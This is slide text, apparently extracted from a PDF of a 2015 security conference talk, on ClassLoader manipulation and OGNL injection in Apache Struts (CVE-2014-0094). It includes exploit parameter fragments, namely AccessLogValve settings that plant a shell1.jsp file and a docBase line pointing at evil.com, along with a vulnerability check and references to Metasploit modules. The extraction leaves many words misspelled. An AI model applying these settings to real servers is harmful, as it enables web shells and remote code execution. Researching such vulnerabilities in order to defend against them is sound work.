Slides for the talk given at RootedCON 2015 security conference by Julián Vilas (security analyst and researcher).
The goal of the talk was giving a view on the security of the Apache Struts framework.
3. ¿Apache
Struts?
Java
framework
– for
Java
webapps
– Two
major
versions
• Struts
1.x
(EoL
since
2013)
• Struts
2.x
4. Why
Struts?
• (Mar
2014)
CVE-‐2014-‐0094
goes
public
• What
the
hell
was
it?
– Struts
2
vulnerability
– UnauthenVcated
– All
versions
affected
– Could
lead
to
RCE
5. CVE-‐2014-‐0094
“ParametersInterceptor
allows
access
to
'class'
parameter
which
is
directly
mapped
to
getClass()
method
and
allows
ClassLoader
manipulaVon”
• Credits:
– Peter
Magnusson
– Przemysław
Celej
• A^er
reading
it…
– Let’s
go
learning
some
basics
6. OGNL
Object
Graph
NavigaVon
Language
• Expression
Language
for
gedng
and
sedng
properVes
of
Java
objects
– Objects
that
are
stored
in
the
Context
8. Struts
2
request
processing
1
7
Filter
Dispatcher
Interceptors
AcVon
Result
/example/hello.acDon
HTML
1
7
User
2 3
4
56
hMp://struts.example.com/example/hello.acDon
HTML
ParametersInterceptor
Struts2
app
9. ParametersInterceptor
“This
interceptor
gets
all
parameters
from
AcVonContext.getParameters()
and
sets
them
on
the
value
stack
by
calling
ValueStack.setValue(String,
Object)”
“Because
parameter
names
are
effecDvely
OGNL
statements,
it
is
important
that
security
be
taken
into
account”
hpp://struts.apache.org/release/2.0.x/struts2-‐core/apidocs/com/opensymphony/xwork2/interceptor/
ParametersInterceptor.html
12. Available
methods
Methods
that
can
be
reached
– As
seen,
OGNL
allows
us
to
reference
gepers
and
sepers
execute()
getUsername()
setUsername()
HelloWorldAcDon
?
AcDonSupport
EXTENDS
14. Available
methods
Methods
that
can
be
reached
– As
seen,
OGNL
allows
us
to
reference
gepers
and
sepers
execute()
getUsername()
setUsername()
HelloWorldAcDon
…
getErrors()
getTexts()
getFieldErrors()
getAcDonErrors()
getAcDonMessages()
getErrorMessages()
…
AcDonSupport
EXTENDS
16. Available
methods
Methods
that
can
be
reached
– As
seen,
OGNL
allows
us
to
reference
gepers
and
sepers
execute()
getUsername()
setUsername()
HelloWorldAcDon
…
getErrors()
getTexts()
getFieldErrors()
getAcDonErrors()
getAcDonMessages()
getErrorMessages()
…
AcDonSupport
EXTENDS
…
getClass()
…
Object
EXTENDS
17. NavigaVng
objects
• Parameters
are
evaluated
iteraVvely
as
an
AST
chain,
composed
by
– A
chain
of
gepers
(without
parameters)
– Ending
with
a
seper
(1
String,
boolean
or
int
parameter)
18. Looking
for
sepers
• Through
object
navigaVon
reach
several
seper
methods
not
part
of
the
AcVon
can
be
reached
– What
methods?
• Post
published
by
neobyte
hpp://sec.baidu.com/index.php?research/detail/id/18
1. PoC
for
gedng
reachable
sepers
2. A
method
for
gedng
RCE
on
Tomcat
8
19. DEMO
Struts
Tester
on
Tomcat
6
/
7
&
Tomcat
8
customized
&
commented
version
ready
to
use
hpps://github.com/julianvilas/rooted2k15
20. Exploitability
Tested
against:
• Tomcat
6
/
7
à
RCE
via
“docBase”
(win
only)
• Tomcat
8
à
RCE
via
“AccessLogValve”
• Glassfish
4
à
RCE
via
“docBase”
(win
only)
• Websphere
8.5
(developer)
à
RCE
not
found
• Weblogic
10
&
12
à
RCE
not
found
• JBOSS
7.1
&
7.4
à
RCE
not
found
21. What
about
Struts
1
• According
to
CVE-‐2014-‐0114,
Struts
1
is
also
vulnerable
• Unpatched!
(struts
1
is
over
EoL,
but
is
sVll
in
use)
• Different
reason:
Struts
1
no
OGNL
nor
Value
Stack
– The
key:
bean
populaVon
with
BeanUVls
• You
can
find
some
Alvaro
Muñoz
(@pwntester)
gold,
like
further
explanaVon
and
a
filter
to
be
applied
as
a
workaround,
at
– hpp://h30499.www3.hp.com/t5/HP-‐Security-‐Research-‐Blog/Protect-‐your-‐
Struts1-‐applicaVons/ba-‐p/6463188#.VBMB0i5_s0z
– hpp://h30499.www3.hp.com/t5/HP-‐Security-‐Research-‐Blog/Update-‐your-‐
Struts-‐1-‐ClassLoader-‐manipulaVon-‐filters/ba-‐p/6639204#.VOsFG7CG_8Q
22. AccessLogValve
exploitaVon
A
log
file
with
name
shell1.jsp
is
created
at
webapps/ROOT.
When
requesVng
a
inexistent
URL,
it’s
logged
into
the
log
file
(that
it’s
going
to
be
interpreted
as
a
JSP
when
get
accessed).
.directory=webapps/ROOT
.prefix=shell
.suffix=.jsp
.fileDateFormat=1
1
2
3
4
24. docBase
exploitaVon
• “The
Document
Base
(also
known
as
the
Context
Root)
directory
for
this
web
applicaVon,
or
the
pathname
to
the
web
applicaDon
archive
file
(if
this
web
applicaVon
is
being
executed
directly
from
the
WAR
file).”
• Legit
applicaVon
goes
down
.docBase=//evil.com/shared
25. About
metasploit
module
• Tomcat
6/7
&
GlassFish
(docBase)
– Only
Win
– Not
landed
yet
in
trunk
but
works
fine
– Maphew
Hall
(0x41414141)
pull
requests:
hpps://github.com/rapid7/metasploit-‐framework/pull/3074
hpps://github.com/rapid7/metasploit-‐framework/pull/3075
hpps://github.com/rapid7/metasploit-‐framework/pull/3323
– Same
module
than
before,
landed
yesterday
night
28. Searching
Struts
sites
• Dumb
detecVon
of
Struts
2
sites
– Default
extension
for
Struts
2:
“.acVon”
• Also,
when
default
configured,
it
accepts
both
“.acVon”
and
no
extension
33. Vulnerability
checking
• To
check
if
a
Struts
2
site
is
vulnerable,
modify
“cacheMaxSize”
property
– Integer.MAX_VALUE
==
2147483647
(in
x86)
• Tomcat
6/7
&
Glassfish
• Tomcat
8
2147483647
2147483648
AAAAAAAAA
34. Vulnerability
checking
• In
Struts
1
if
the
conversion
String
to
Integer
fails
a
default
value
0
is
set
• But
when
trying
to
set
a
method
that
receives
an
Object
with
a
String,
a
excepVon
is
raised
ROOTEDCON
36. Previous
security
bulleVns
RCE,
when
form
validaDon
fails
field
values
are
interpreted
as
OGNL
RCE,
bypass
the
'#'-‐usage
protecDon
built
into
the
ParametersInterceptor
to
execute
OGNL
RCE,
bypass
the
'#'-‐usage
protecDon
built
into
the
ParametersInterceptor
to
execute
OGNL
!
S2-‐003
fix
was
incomplete
RCE,
user’s
input
is
evaluated
as
OGNL
when
there’s
a
conversion
error
Several
RCE:
via
ExcepDonDelegator
(same
as
S2-‐007),
CookieInterceptor
(same
idea
than
S2-‐003
and
S2-‐005),
etc.
RCE,
incomplete
fix
for
S2-‐003
and
S2-‐005
on
ParametersInterceptor
37. Previous
security
bulleVns
RCE,
incomplete
fix
for
S2-‐003,
S2-‐005
and
S2-‐009
on
ParametersInterceptor
when
using
values
for
redirecDons
RCE,
s:url
and
s:a
tags,
when
"includeParams"
is
set,
allow
evaluaDng
the
values
of
request
parameters
as
OGNL.
RCE,
same
than
S2-‐013,
incomplete
fix.
RCE,
acDons
using
wildcards
and
Double
OGNL
evaluaDon
allow
OGNL
injecDon
RCE:
DefaultAcDonMapper
short-‐circuit
navigaDon
interpreted
as
OGNL
RCE,
what
we
saw
in
this
presentaDon
☺
(ParametersInterceptor)
RCE,
Incomplete
fix
for
S2-‐020
Incomplete
fix
for
S2-‐020
and
S2-‐021
39. Conclusions?
• Seven
years
from
between
S2-‐001
and
S2-‐020
• Same
kind
of
vulnerabiliVes:
injecDng
OGNL
from
user-‐supplied
data
• Several
bypasses
for
fixes
• Almost
all
RCE
• Take
your
own…
40. Bonus
track
-‐
Confluence
• Is
based
on
a
WebWork
fork
(previous
than
Struts
2)
• If
you
look
their
bulleVns
– Versions
up
to
and
including
5.5.1
vulnerable
to
ClassLoader
manipulaDon
hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory
+2014-‐05-‐21
– Versions
up
to
5.6
(before
5.6.6
and
5.5.7)
are
vulnerable
to
double
OGNL
evaluaDon
hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-‐
+2015-‐01-‐21
• Don’t
they
look
familiar?
J